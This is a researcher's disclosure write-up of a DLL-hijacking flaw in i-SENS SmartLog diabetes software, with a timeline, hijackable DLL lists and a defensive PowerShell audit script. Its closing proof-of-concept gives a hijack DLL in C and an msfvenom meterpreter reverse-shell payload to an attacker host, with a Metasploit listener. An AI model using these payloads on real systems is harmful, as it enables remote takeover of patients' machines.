(CVE-2017-13993) i-SENS Inc. SmartLog Diabetes Management Software Vulnerability

Background:

On 3 August 2017 I discovered an Uncontrolled Search Path Element (CWE-427) vulnerability in i-SENS Inc. SmartLog Diabetes Management Software. This vulnerability can be exploited by placing a crafted DLL file in the search path which is loaded prior to a valid DLL, allowing an attacker to hijack the DLL and execute arbitrary code on the targeted system. The SmartLog Diabetes Management Software is used by patients to track and monitor personal blood glucose levels by connecting their blood glucose meters via USB to a computer. According to i-SENS Inc., SmartLog Diabetes Management Software is deployed across the Healthcare and Public Health sector. i-SENS estimates that these products are distributed and used worldwide.

Coordinated disclosure regarding the identified vulnerability was undertaken with i-SENS Inc. The US Department of Homeland Security’s ICS-CERT have published the findings under ICS-CERT Advisory ICSMA-17-250-01, and allocated CVE-ID CVE-2017-13993.

The Department of Homeland Security’s ICS-CERT advisory (ICSMA-17-250-01) can be found here.

In response to the coordinated disclosure activities, i-SENS Inc. have released version 2.4.1 to address the vulnerability. The new version of SmartLog can be found here.

Uncontrolled Search Path Element (CVE-2017-13993 | CVSS v3 7.3)

Summary
Product: SmartLog Diabetes Management Software 2.4.0
Version: Latest version 2.4.0 and prior
Vendor: i-SENS Inc. (www.i-sens.com)
CVE-ID: CVE-2017-13993
CWE-427: Uncontrolled Search Path Element
CVSS v3: Base Score 7.3 (CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H)

An uncontrolled search path vulnerability was discovered in i-SENS Inc SmartLog Diabetes Management Software 2.4.0 and prior. This vulnerability can be exploited by placing a crafted DLL file in the search path which is loaded prior to a valid DLL, allowing an attacker to hijack the DLL and execute arbitrary code on the targeted system.

Disclosure Timeline

3 August 2017
– DLL Hijacking vulnerability discovered. Further testing commenced.

04 August 2017
– Emailed smartlog.pc@i-sens.com and custserv@caresens.com.au requesting contact details for identified vulnerabilities
– Response from i-SENS with contact details to send disclosure to.
– Vulnerability disclosure information sent to i-SENS Inc. contact (30-day disclosure window)

08 August 2017
– Vendor acknowledged vulnerabilities and commenced remediation works

21 August 2017
– Emailed vendor for a status update

22 August 2017
– Vendor provided a patched version of the SmartLog software and requested a retest to confirm the vulnerabilities had been fixed
– Vendor confirmed public release of v2.4.1 for 1 September

23 August 2017
– Identified vulnerabilities retested.
– Advised vendor that vulnerabilities have been fixed with latest patch release.
– Vendor advised they have no experience with the CVE-ID process and requested that I manage it via ICS-CERT
– Emailed ICS-CERT requesting that a ticket be raised, a CVE-ID allocated, and the advisory released on 1 September

08 September 2017
– CVE-ID allocated and public disclosure of the vulnerability

Tested versions

This vulnerability was tested on the following versions:

– SmartLog Diabetes Management Software 2.2.0
– SmartLog Diabetes Management Software 2.4.0

Details

i-SENS Inc SmartLog Diabetes Management Software 2.4.0 is a “program designed to provide pictorial views of your glucose levels to show trends and patterns from glucose test results downloaded from CareSens and other i-SENS glucometers. You can comprehensively manage your diabetes by recording info such as diet, exercise, medication, and insulin injections.” Further information can be found at the following URL: http://www.i-sens.com/html/sub04_03.php?ckattempt=1

Vulnerable versions of SmartLog Diabetes Management Software (2.4.0 and prior) use an uncontrolled search path when loading DLLs. An attacker may leverage this by crafting a DLL with the name of a library the application attempts to load and copying it to a location on the target system that is searched before the legitimate library's location.

SmartLog Diabetes Management Software 2.4.0 is vulnerable to DLL hijacking in multiple separate conditions.

# DLL Hijacking upon application launch

Vulnerable versions of SmartLog Diabetes Management Software (2.4.0 and prior) can be exploited at application launch by placing crafted DLLs in the same directory as the application executable, which the Windows loader searches before the system directories for any DLL that is not a KnownDLL.

The install path "c:\SmartLog2\" carries the permissions shown below. The (M) entries grant Modify, which includes creating files, to NT AUTHORITY\Authenticated Users, so any low privileged authenticated user can place a crafted DLL into the uncontrolled search path. These entries are inherited ((I)) from the drive root, where Windows grants Authenticated Users Modify on subfolders by default; a directory under C:\Program Files would not inherit them.

C:\>icacls SmartLog2
SmartLog2 BUILTIN\Administrators:(I)(F)
          BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
          NT AUTHORITY\SYSTEM:(I)(F)
          NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
          BUILTIN\Users:(I)(OI)(CI)(RX)
          NT AUTHORITY\Authenticated Users:(I)(M)
          NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)

# DLL Hijacking upon importing, exporting, and restoring data

Vulnerable versions of SmartLog Diabetes Management Software 2.4.0 can be exploited when a user imports, exports, or restores data via the Download / Data menu option, by placing crafted DLLs in the same directory as the application executable. The overly permissive rights on the executable's directory allow any low privileged authenticated user to exploit the vulnerability by placing a crafted DLL into the uncontrolled search path.

# DLL Hijacking during reporting of data

Vulnerable versions of SmartLog Diabetes Management Software 2.4.0 can be exploited when a user emails, prints, or exports data via the Report menu option, by placing crafted DLLs in the same directory as the application executable. The overly permissive rights on the executable's directory allow any low privileged authenticated user to exploit the vulnerability by placing a crafted DLL into the uncontrolled search path.

# DLL Hijacking on product installation.

i-SENS Inc. provides a Windows installer package for SmartLog Diabetes Management Software 2.4.0. An attacker with write access to the directory where the victim has stored the downloaded installer can place crafted DLLs in the search path, resulting in DLL hijacking and execution of arbitrary code on the targeted system when the product is initially installed.

Vulnerable DLLs

The following DLLs have been individually tested and can be hijacked when the vulnerable version of SmartLog Diabetes Management Software 2.4.0 software is launched:

– cryptsp.dll
– dhcpcsvc.dll
– dhcpcsvc6.dll
– libssl-7.dll
– libssl-8.dll
– libssl-10.dll
– ntmarta.dll
– rasadhlp.dll
– rpcrtremote.dll
– ssleay32.dll
– wlanapi.dll.dll

The following DLLs have been individually tested and can be hijacked when a user is importing, exporting, and restoring data within the vulnerable version of SmartLog Diabetes Management Software 2.4.0 software:

– browcli.dll
– cscapi.dll
– dfscli.dll
– linkinfo.dll
– msftedit.dll
– msi.dll
– msls31.dll
– netutils.dll
– shdocvw.dll
– slc.dll
– srvcli.dll
– windowscodecs.dll
– wkscli.dll

The following DLLs have been individually tested and can be hijacked when a user is reporting data within the vulnerable version of SmartLog Diabetes Management Software 2.4.0 software:

– cscapi.dll
– msi.dll
– propsys.dll
– slc.dll
– srvcli.dll
– windowscodecs.dll

The following DLLs have been individually tested and can be hijacked when a user initially installs the vulnerable version of SmartLog Diabetes Management Software 2.4.0 software:

– cscapi.dll
– dwmapi.dll
– linkinfo.dll
– netutils.dll
– ntmarta.dll
– ntshrui.dll
– shfolder.dll
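The two conditions documented above, an install directory writable by Authenticated Users and system DLL names appearing next to the executable, can be checked from the host side. The following PowerShell audit script is an added example and is not part of the i-SENS advisory, the SmartLog product, or its 2.4.1 fix. It assumes the install directory C:\SmartLog2 from the icacls output (override with -AppDir), uses the DLL names listed in this advisory as its watch list, and the icacls hardening commands it prints are a suggested host-side mitigation, not the vendor's fix.

```powershell
<#
  Added audit script; not from the i-SENS advisory or the SmartLog product.
  Assumption (not stated in the advisory): the install directory is
  C:\SmartLog2, the path whose ACL the advisory shows. Pass -AppDir otherwise.
  Runs as an ordinary user: it only reads the ACL and lists files.
#>
param(
    [string]$AppDir = 'C:\SmartLog2'
)

# DLL names the advisory reports as hijackable across all four conditions.
# None should be found in the application directory: the Windows ones belong
# in System32, and if the OpenSSL ones (libssl-*.dll, ssleay32.dll) ship with
# the product they should at least carry a valid Authenticode signature.
$HijackableDlls = @(
    'cryptsp.dll', 'dhcpcsvc.dll', 'dhcpcsvc6.dll', 'libssl-7.dll', 'libssl-8.dll',
    'libssl-10.dll', 'ntmarta.dll', 'rasadhlp.dll', 'rpcrtremote.dll', 'ssleay32.dll',
    'wlanapi.dll.dll', 'browcli.dll', 'cscapi.dll', 'dfscli.dll', 'linkinfo.dll',
    'msftedit.dll', 'msi.dll', 'msls31.dll', 'netutils.dll', 'shdocvw.dll', 'slc.dll',
    'srvcli.dll', 'windowscodecs.dll', 'wkscli.dll', 'propsys.dll', 'dwmapi.dll',
    'ntshrui.dll', 'shfolder.dll'
)

# Groups every interactive local user belongs to (English Windows names).
# Write access for any of them lets a low-privileged account plant a DLL.
$LowPrivPrincipals = @(
    'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'Everyone',
    'NT AUTHORITY\INTERACTIVE'
)

function Test-LowPrivWriteAccess {
    param([string]$Path)
    $acl = Get-Acl -LiteralPath $Path
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($LowPrivPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        $r = [int]$ace.FileSystemRights
        # WriteData (0x2) is the right that creates or overwrites a file. ACEs
        # inherited from the drive root may instead carry generic rights:
        # GENERIC_WRITE (0x40000000) and GENERIC_ALL (0x10000000) include it.
        $canWrite = (($r -band 0x2) -ne 0) -or (($r -band 0x40000000) -ne 0) -or (($r -band 0x10000000) -ne 0)
        if ($canWrite) {
            [pscustomobject]@{
                Principal = $ace.IdentityReference.Value
                Rights    = $ace.FileSystemRights
                Inherited = $ace.IsInherited
            }
        }
    }
}

function Find-PlantedDll {
    param([string]$Path)
    Get-ChildItem -LiteralPath $Path -Filter '*.dll' -File -ErrorAction SilentlyContinue |
        Where-Object { $HijackableDlls -contains $_.Name.ToLowerInvariant() } |
        ForEach-Object {
            $sig = Get-AuthenticodeSignature -FilePath $_.FullName
            [pscustomobject]@{
                File      = $_.FullName
                Signature = $sig.Status   # NotSigned is the usual tell for a planted DLL
                Signer    = $sig.SignerCertificate.Subject
                SHA256    = (Get-FileHash -LiteralPath $_.FullName -Algorithm SHA256).Hash
            }
        }
}

if (-not (Test-Path -LiteralPath $AppDir -PathType Container)) {
    throw "Application directory not found: $AppDir"
}

$writable = @(Test-LowPrivWriteAccess -Path $AppDir)
$planted  = @(Find-PlantedDll -Path $AppDir)

if ($writable.Count -gt 0) {
    Write-Output "[!] $AppDir is writable by low-privileged principals:"
    $writable | Format-Table -AutoSize | Out-String | Write-Output
    # Suggested hardening (printed, not executed): break inheritance, drop the
    # inherited Modify grant and leave ordinary users with read/execute only.
    # A host-side mitigation only; it does not replace upgrading to 2.4.1.
    Write-Output ('    icacls "{0}" /inheritance:d' -f $AppDir)
    Write-Output ('    icacls "{0}" /remove:g "NT AUTHORITY\Authenticated Users"' -f $AppDir)
    Write-Output ('    icacls "{0}" /grant:r "BUILTIN\Users:(OI)(CI)RX"' -f $AppDir)
} else {
    Write-Output "[+] No low-privileged write access to $AppDir"
}

if ($planted.Count -gt 0) {
    Write-Output "[!] Hijackable DLL names present beside the executable (verify each):"
    $planted | Format-List | Out-String | Write-Output
} else {
    Write-Output "[+] None of the advisory's DLL names found in $AppDir"
}
```

Run it as the ordinary user who uses SmartLog, since that is the account whose write access matters. A hit in the second check that is unsigned, or signed by someone other than the expected publisher, is worth preserving with its hash before it is removed, because a planted DLL in this directory runs every time the application starts.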

Exploitability

An attacker must have low privileged authenticated access to the local target system in order to exploit this vulnerability, or must be able to social engineer the user into placing the crafted DLL file where the application will find it. Once the application loads the crafted DLL, the attacker's code runs with the same privileges as the user running the program, and well known post-exploitation techniques can then be used to gain persistent access to the target system as that user.

POC

#—
# MessageBox PoC
#—

This PoC will display a message box when the crafted DLL is loaded by the application.

1. Create a file called ntmarta.c with the following content:

#include <windows.h>

/* Declared before DllMain so the call below compiles cleanly. */
void dll_exploit(void);

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    switch (fdwReason)
    {
    case DLL_PROCESS_ATTACH:
        /* Runs as soon as the hijacked DLL is mapped into the process. */
        dll_exploit();
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }

    return TRUE;
}

void dll_exploit(void)
{
    MessageBox(0, "Success", "ntmarta DLL Hijack", MB_OK);
}

2. Compile as a DLL with the following command on a Linux host:

> i686-w64-mingw32-gcc ntmarta.c -o ntmarta.dll -shared

The i686 target produces a 32-bit DLL. The DLL's bitness must match the process that loads it, so for a 64-bit target process use x86_64-w64-mingw32-gcc instead.

3. Copy the DLL file to the same location as the application executable and observe the DLL Hijack message box popup when launching i-SENS Inc. SmartLog Diabetes Management Software 2.4.0.

#—
# Reverse shell PoC
#—

This PoC results in a reverse shell connection from the target host back to the attacker's listener. The attacker inherits the same permissions as the victim user.

1. Create a DLL with a meterpreter Reverse TCP payload.

> msfvenom -p windows/meterpreter/reverse_tcp --platform windows -f dll LHOST=<attacker-ip> LPORT=<port> > ntmarta.dll

2. Create a listener for the reverse shell in metasploit:

msf > use exploit/multi/handler
msf > set payload windows/meterpreter/reverse_tcp
msf > set lhost <attacker-ip>
msf > set lport <port>
msf > exploit

3. With the listener ready to receive the reverse shell, copy the DLL file to the same location as the application executable and observe a reverse shell connection from the target system to the attacking host when launching i-SENS Inc. SmartLog Diabetes Management Software 2.4.0.